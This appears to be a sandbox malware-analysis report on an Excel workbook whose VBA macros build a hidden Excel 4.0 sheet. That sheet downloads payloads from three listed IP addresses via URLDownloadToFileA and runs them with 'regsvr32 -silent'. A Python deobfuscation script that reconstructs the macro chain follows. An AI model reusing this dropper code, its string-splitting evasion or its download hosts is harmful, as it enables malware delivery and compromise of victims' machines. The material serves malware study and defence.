    Data Raw:01 16 03 00 03 f0 00 00 00 5a 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 88 04 00 00 b0 0a 00 00 00 00 00 00 01 00 00 00 fb 18 3d fb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module1"
    
    Function jgfjgjfhfhf()
    Application.ScreenUpdating = False
    Set Fera = Excel4IntlMacroSheets
    Fera.Add.Name = "Diolare"
    Sheets("Diolare").Visible = False
    Nyrtyfh
    Sheets("Diolare").Range("H24") = UserForm2.Label1.Caption
    Sheets("Diolare").Range("H25") = UserForm2.Label3.Caption
    Sheets("Diolare").Range("H26") = UserForm2.Label4.Caption
    End Function
    Sub auto_close()
    
    
    Application.ScreenUpdating = True
       Application.DisplayAlerts = False
       Sheets("Diolare").Delete
       Application.DisplayAlerts = True
    
    End Sub
    
    Function Nyrtyfh()
    Sheets("Diolare").Range("A1:M100").Font.Color = vbWhite
    
    End Function
    
    
    Function hkjhjk()
    Sheets("Diolare").Range("G10") = UserForm2.Label5.Caption
    Sheets("Diolare").Range("G11") = UserForm2.Label5.Caption & "1"
    Sheets("Diolare").Range("G12") = UserForm2.Label5.Caption & "2"
    
    End Function
    
    
    Function Fdjgj()
    Sheets("Diolare").Range("H10") = "=" & "B" & "y" & "u" & "k" & "i" & "l" & "o" & "s(0,H24&K17&K18,G10,0,0)"
    Sheets("Diolare").Range("H11") = "=" & "B" & "y" & "u" & "k" & "i" & "l" & "o" & "s(0,H25&K17&K18,G11,0,0)"
    Sheets("Diolare").Range("H12") = "=" & "B" & "y" & "u" & "k" & "i" & "l" & "o" & "s(0,H26&K17&K18,G12,0,0)"
    
    End Function
    VBA File Name: Module2, Stream Size: 2740
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module2
    VBA File Name:Module2
    Stream Size:2740
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 dc 08 00 00 00 00 00 00 01 00 00 00 fb 18 75 d6 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module2"
    Function Retio()
    On Error Resume Next
    Bytruy = "R" & "E" & "G" & "I" & "STER"
    Neyrey = "="
    JRyf = "" & "E" & "" & "X" & "" & "E" & "" & "C"
    Loiu = UserForm2.Blost.Caption
    jgfjgjfhfhf
    
    
    Sheets("Diolare").Range("K17") = "=N" & "O" & "W()"
    Sheets("Diolare").Range("K18") = ".d" & "a" & "t"
    
    
    
    Sheets("Diolare").Range("H35") = "=" & "H" & "ALT()"
    Sheets("Diolare").Range("I9") = "u" & "R" & "l" & "M" & "o" & "n"
    Sheets("Diolare").Range("I10") = UserForm2.Caption
    Sheets("Diolare").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
    Sheets("Diolare").Range("I12") = "Byukilos"
    
    hkjhjk
    
    Sheets("Diolare").Range("I17") = Loiu
    Sheets("Diolare").Range("I18") = Loiu & "1"
    Sheets("Diolare").Range("I19") = Loiu & "2"
    
    Fdjgj
    
    Sheets("Diolare").Range("H9") = Neyrey & Bytruy & "(I9,I10&J10,I11,I12,,1,9)"
    Sheets("Diolare").Range("H17") = Neyrey & JRyf & "(I17)"
    Sheets("Diolare").Range("H18") = Neyrey & JRyf & "(I18)"
    Sheets("Diolare").Range("H19") = Neyrey & JRyf & "(I19)"
    End Function
    VBA File Name: Module5, Stream Size: 1116
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module5
    VBA File Name:Module5
    Stream Size:1116
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 01 f0 00 00 00 82 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 89 02 00 00 d1 03 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module5"
    
    Sub auto_open()
    Retio
    
    
    Application.Run Sheets("Diolare").Range("H1")
    
    End Sub
    VBA File Name: Sheet1, Stream Size: 991
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
    VBA File Name:Sheet1
    Stream Size:991
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Sheet1"
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    VBA File Name: ThisWorkbook, Stream Size: 3459
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
    VBA File Name:ThisWorkbook
    Stream Size:3459
    Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 32 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 39 04 00 00 b1 0a 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "ThisWorkbook"
    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    Option Explicit
    Public Sub applyLogosToDashboard()
        On Error Resume Next
    Application.ScreenUpdating = False
    
    If Not Application.OperatingSystem Like "*Mac*" Then
    
        Sheets("Dashboard").Activate
        Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
        ActiveSheet.Shapes("Apple_Logo").Visible = False
        ActiveSheet.Shapes("Win_Logo").Visible = True
        ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
        ActiveSheet.Shapes("Button_Print_PDF").Visible = True
        ActiveSheet.Shapes("Button_Save_As").Visible = True
        ActiveSheet.Shapes("Button_Help").Visible = True
        ActiveSheet.Shapes("Button_Versions").Visible = True
        Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
    
    Else
    
        Sheets("Dashboard").Activate
        Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
        ActiveSheet.Shapes("Apple_Logo").Visible = True
        ActiveSheet.Shapes("Win_Logo").Visible = False
        ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
        ActiveSheet.Shapes("Button_Print_PDF").Visible = False
        ActiveSheet.Shapes("Button_Save_As").Visible = False
        Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
    
    End If
    
        Application.ScreenUpdating = True
    
    End Sub
    
    
    Private Sub asWorkbook_Activateas()
    
    End Sub
    
    Private Sub saWorkbook_Opensa()
        On Error Resume Next
    
    
    End Sub
    
    Private Sub ssaaInitWorkbookssaa()
    End Sub
    VBA File Name: UserForm2, Stream Size: 1181
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
    VBA File Name:UserForm2
    Stream Size:1181
    Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "UserForm2"
    Attribute VB_Base = "0{321AAC3F-DD5A-4CF0-A4C5-4038687335A4}{A2E6A6F6-AD1B-4ECB-AF0A-AF8F18A7E980}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False

    Streams

    Stream Path: \x1CompObj, File Type: data, Stream Size: 108
    General
    Stream Path:\x1CompObj
    File Type:data
    Stream Size:108
    Entropy:4.18849998853
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:244
    Entropy:2.65175227267
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:208
    Entropy:3.35331470988
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101947
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:101947
    Entropy:7.65093094683
    Base64 Encoded:True
    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V q % 8 . . . . . . . X . @
    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 743
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:743
    Entropy:5.27552225461
    Base64 Encoded:True
    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . .
    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
    Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTlk
    File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
    Stream Size:30
    Entropy:1.37215976263
    Base64 Encoded:False
    Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
    Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 164
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
    File Type:data
    Stream Size:164
    Entropy:3.40743696106
    Base64 Encoded:False
    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
    File Type:data
    Stream Size:97
    Entropy:3.61064918306
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
    File Type:ASCII text, with CRLF line terminators
    Stream Size:302
    Entropy:4.65387104915
    Base64 Encoded:True
    Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
    Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
    Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 307
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/f
    File Type:data
    Stream Size:307
    Entropy:3.62190320372
    Base64 Encoded:False
    Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . P . . . . . . . B l o s t 4 . . .
    Data Raw:00 04 24 00 08 0c 10 0c 0c 00 00 00 ff ff 00 00 14 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 05 00 00 00 e0 00 00 00 00 85 01 00 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d4 00 00 00 d4
    Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 356
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/o
    File Type:data
    Stream Size:356
    Entropy:3.89820436327
    Base64 Encoded:True
    Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 0 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 9 4 . 1 4 0 . 1 1 4 . 1 1 1 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 8 . 1 6 5 . 6 2 . 5 0 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . 0 . ( . . . . . . . r e g s v r 3 2 - s i l e n t . . \\ C e l o d . w a
    Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 30 37 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 28 00 28 00 00 00 16 00 00 80 68 74 74 70 3a 2f 2f 39 34 2e 31 34 30 2e 31 31 34 2e 31 31 31 2f 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80
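What the VBA in Module1, Module2 and Module5 actually assembles can be recovered without opening the workbook, which matters here because auto_close deletes the "Diolare" sheet again and the report's dynamic run only shows the resulting regsvr32 processes. The following Python script is an added example written for this page (it is not part of the Joe Sandbox report and not code from the sample): it replays the Sheets("Diolare").Range(...) assignments in the order Retio() performs them, fills the UserForm2 controls with the strings visible in the UserForm2/o and UserForm2/\x3VBFrame streams, and then walks column H from H1 downward the way Application.Run Sheets("Diolare").Range("H1") does, printing each formula with its cell references resolved. Assumptions, also marked in the code: Label1/Label3/Label4 hold the three URLs in the order they appear in the o stream (the same order as the TCP connections in the Network Behavior section), Label5 holds "..\Celod.wac" (the drop path implied by the regsvr32 command lines in the process tree; the report does not print that label), and NOW() is replaced by a fixed Excel date serial so the output is deterministic.

```python
"""Reconstruct and walk the hidden 'Diolare' Excel 4.0 macro sheet built by the VBA."""
import re

# Control values taken from the UserForm2 streams in the report. Label5 is not
# printed by the report; "..\Celod.wac" is an ASSUMPTION derived from the
# regsvr32 command lines in the process tree.
USERFORM2 = {
    "Caption": "URLDownloadToFileA",            # \x3VBFrame stream
    "Label1": "http://190.14.37.107/",          # o stream (label order assumed)
    "Label3": "http://94.140.114.111/",
    "Label4": "http://188.165.62.50/",
    "Label5": r"..\Celod.wac",                  # assumption, see above
    "Blost": r"regsvr32 -silent ..\Celod.wac",  # o stream
}

# Fixed stand-in for =NOW() (an Excel date serial; 2021-10-06 is about 44475) so
# the reconstructed URLs are deterministic; the real sample gets a fresh value per run.
FIXED_NOW = "44475.7426"


def build_macro_sheet(form):
    """Replay the Sheets("Diolare").Range(...) = ... writes in the order Retio()
    performs them (calling jgfjgjfhfhf, hkjhjk and Fdjgj along the way)."""
    s = {}
    # jgfjgjfhfhf(): download URLs (after hiding the sheet and whitening its font)
    s["H24"], s["H25"], s["H26"] = form["Label1"], form["Label3"], form["Label4"]
    # Retio(): split-string constants
    s["K17"] = "=NOW()"
    s["K18"] = ".dat"
    s["H35"] = "=HALT()"
    s["I9"] = "uRlMon"
    s["I10"] = form["Caption"]
    s["I11"] = "JJCCBB"
    s["I12"] = "Byukilos"
    # hkjhjk(): local file names for the three downloads
    s["G10"] = form["Label5"]
    s["G11"] = form["Label5"] + "1"
    s["G12"] = form["Label5"] + "2"
    # Retio(): command lines for EXEC
    s["I17"] = form["Blost"]
    s["I18"] = form["Blost"] + "1"
    s["I19"] = form["Blost"] + "2"
    # Fdjgj(): calls to the alias registered for URLDownloadToFileA
    for row, url, path in ((10, "H24", "G10"), (11, "H25", "G11"), (12, "H26", "G12")):
        s[f"H{row}"] = f"=Byukilos(0,{url}&K17&K18,{path},0,0)"
    # Retio(): REGISTER and the three EXEC cells
    s["H9"] = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
    s["H17"], s["H18"], s["H19"] = "=EXEC(I17)", "=EXEC(I18)", "=EXEC(I19)"
    return s


# A cell reference, optionally chained with & (Excel's string concatenation).
REF_CHAIN = re.compile(r"\b[A-Z]{1,2}\d{1,3}\b(?:&[A-Z]{1,2}\d{1,3}\b)*")


def cell_value(sheet, ref, now=FIXED_NOW):
    """Value of a referenced cell; =NOW() is the only formula the sheet references."""
    v = sheet.get(ref, "")
    return now if v == "=NOW()" else v


def deobfuscate(sheet, formula, now=FIXED_NOW):
    """Replace every reference chain in a formula body with its concatenated value."""
    def expand(m):
        return '"' + "".join(cell_value(sheet, r, now) for r in m.group(0).split("&")) + '"'
    return REF_CHAIN.sub(expand, formula)


def run_column_h(sheet, start_row=1, now=FIXED_NOW):
    """Emulate Application.Run Sheets("Diolare").Range("H1"): an XLM macro runs
    downward from the start cell, skipping blank and constant cells, until HALT()."""
    trace = []
    for row in range(start_row, 65537):
        formula = sheet.get(f"H{row}", "")
        if not formula.startswith("="):
            continue
        line = deobfuscate(sheet, formula[1:], now)
        trace.append((f"H{row}", line))
        if line.startswith("HALT("):
            break
    return trace


if __name__ == "__main__":
    for cell, line in run_column_h(build_macro_sheet(USERFORM2)):
        print(f"{cell:<4} {line}")
```

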